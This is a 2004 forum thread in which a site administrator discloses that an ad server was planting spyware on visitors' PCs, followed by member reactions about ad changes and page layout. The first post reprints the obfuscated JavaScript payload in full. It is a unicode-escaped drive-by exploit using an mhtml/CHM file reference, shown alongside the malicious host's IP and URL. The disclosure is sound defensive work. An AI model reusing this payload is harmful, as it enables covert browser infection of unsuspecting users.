Steven P. Administrators Posted April 21, 2004 Administrators Share Posted April 21, 2004 ok first off I want to thank Adster. We had some pretty heated discussion on the method of his postings but I am now convinced he was helping, and he did.. Heres what we found out: I got the PM from Adster and he is correct that an adserver is loading spyware on members PC's I can't however trace the IP to a single advertiser. The IP is 69.50.139.61 and the url is 69.50.139.61/hp1/hp1.htm (url disabled, don't access it on an unprotected PC please) it contains java script: <!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot --> <script type="text/javascript">document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u000d\u000a')</script> if you browse to the root folders you get the message: This is an adserver. Please contact advertisers directly So I think we can safely say this does come from one of our advertisers. I have blocked the IP in cPanel.. a WHOIS returns very little information: NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1) 69.50.128.0 - 69.50.143.255 OMEGABYTE Computer Corporation MACH10-OMEGA1 (NET-69-50-139-0-1) 69.50.139.0 - 69.50.139.127 # ARIN WHOIS database, last updated 2004-04-20 20:01 # Enter ? for additional hints on searching ARIN's WHOIS database. and now for the bad news.. http://www.google.nl/search?num=20&hl=en&i...Inc&btnG=Search NationalNet Inc is a large Adult hosting company, so this makes me wonder what they are doing to with our webviews and why they are involved with one of our ad companies! As a result we have disabled ALL 468x60 ads and become a member of Google AdSense (which are now displaying all 468x60 ads on Neowin). We can be sure the ads they deliver will not attempt to load spyware on your PC. The intelliText on the main page, AdSquares and towers remain (also not on the forums anyway) Google AdSense also has the option to deliver feedback if you click the Ads by Google link. I want to thank everyone who helped us get to the bottom of this the only negative side to this is that we couldn't find out which advertiser controls that IP (all our advertisers deny being involved with Spyware) Link to comment Share on other sites More sharing options...
Japlabot Posted April 22, 2004 Share Posted April 22, 2004 So are the Google ads per view or per click? and do they pay the same/more/less? I definately hope that it's enough to pay for your costs otherwise if you are losing money, I would do something to help get some more money into Neowin. Link to comment Share on other sites More sharing options...
aem4162 Posted April 22, 2004 Share Posted April 22, 2004 what, if anything do we do to get the stuff off our computers? i'm gonna run ad-aware and spybot.... Link to comment Share on other sites More sharing options...
Ivand Posted April 22, 2004 Share Posted April 22, 2004 I like the changes Neobond, i like more the no graphical ads by googl Link to comment Share on other sites More sharing options...
Chode Posted April 22, 2004 Share Posted April 22, 2004 Great changes (Y) I've never seen a problem with Google's ads Link to comment Share on other sites More sharing options...
kongit Posted April 22, 2004 Share Posted April 22, 2004 (Y) great. ps. this thread is insanely wide. Link to comment Share on other sites More sharing options...
Wiser87 Posted April 22, 2004 Share Posted April 22, 2004 (Y) great.ps. this thread is insanely wide. Hahahahaha! I was wondering when someone was going to mention that! :D :laugh: Link to comment Share on other sites More sharing options...
Steven P. Administrators Posted April 22, 2004 Author Administrators Share Posted April 22, 2004 (Y) great.ps. this thread is insanely wide. not for me it isn't (using IE6) Link to comment Share on other sites More sharing options...
calidude Posted April 22, 2004 Share Posted April 22, 2004 Not insanely wide for me either... Link to comment Share on other sites More sharing options...
Japlabot Posted April 22, 2004 Share Posted April 22, 2004 it's screwed up for me in IE6, but worse in the fox. Link to comment Share on other sites More sharing options...
Oblivion Posted April 22, 2004 Share Posted April 22, 2004 Nice Move Neobond (Y) Link to comment Share on other sites More sharing options...
Si Veteran Posted April 22, 2004 Veteran Share Posted April 22, 2004 Wow Neobond is romping through the site maintenance at the minute! Thanks for you hard work! (Y) Also, this thread is very wide (using firefox 0.8+) Link to comment Share on other sites More sharing options...
Rell Posted April 22, 2004 Share Posted April 22, 2004 ps. this thread is insanely wide. Description of post should say... "Warning: Some users of alternative browsers (Firefox) may experience a wide load." :rofl: Link to comment Share on other sites More sharing options...
tomwarren Veteran Posted April 22, 2004 Veteran Share Posted April 22, 2004 Good to hear :) Bloody advertising companies, anyway to make money - pssh. Link to comment Share on other sites More sharing options...
Toxikk Veteran Posted April 22, 2004 Veteran Share Posted April 22, 2004 woohoo! finally got to the bottom of that whole mess. thanks! the new ones look great. Link to comment Share on other sites More sharing options...
Frank Posted April 22, 2004 Share Posted April 22, 2004 For the people having problems with the thread being wide, try changing your resolution. Mine was fine untill SOMEONE posted a pic. :D Link to comment Share on other sites More sharing options...
Adster Posted April 22, 2004 Share Posted April 22, 2004 It's me again! :p I just wanted to thank Neobond for nipping this thing before the problem became more widespread. He's a great Admin. Thumbs up to you! (Y) On a side note, one more thing about that trojan that I didn't realize earlier. It replaces wmplayer.exe with an installation file so when you try to open a video or audio file that opens in Windows Media Player, it downloads more spyware instead. To fix that, run wm_setup.exe in the same directory (usually C:\Program Files\Windows Media Player) and it will re-download the original wmplayer.exe file. Once again, thanks Neobond! Link to comment Share on other sites More sharing options...
Zetter Posted April 22, 2004 Share Posted April 22, 2004 the google adds may not be as relevent as they could be... Longhorn Texas Compare and buy it on eBay. Thousands of new & used items! Methinks Keywords should be re-thought Link to comment Share on other sites More sharing options...
Steven P. Administrators Posted April 22, 2004 Author Administrators Share Posted April 22, 2004 the google adds may not be as relevent as they could be...Longhorn Texas Compare and buy it on eBay. Thousands of new & used items! Methinks Keywords should be re-thought I thought I asked people not to whine about the ads. How many times do I have to say that we need them, do you think I want them? Link to comment Share on other sites More sharing options...
vip Posted April 22, 2004 Share Posted April 22, 2004 wow, this thread is like WHOA wide .... Link to comment Share on other sites More sharing options...
Recommended Posts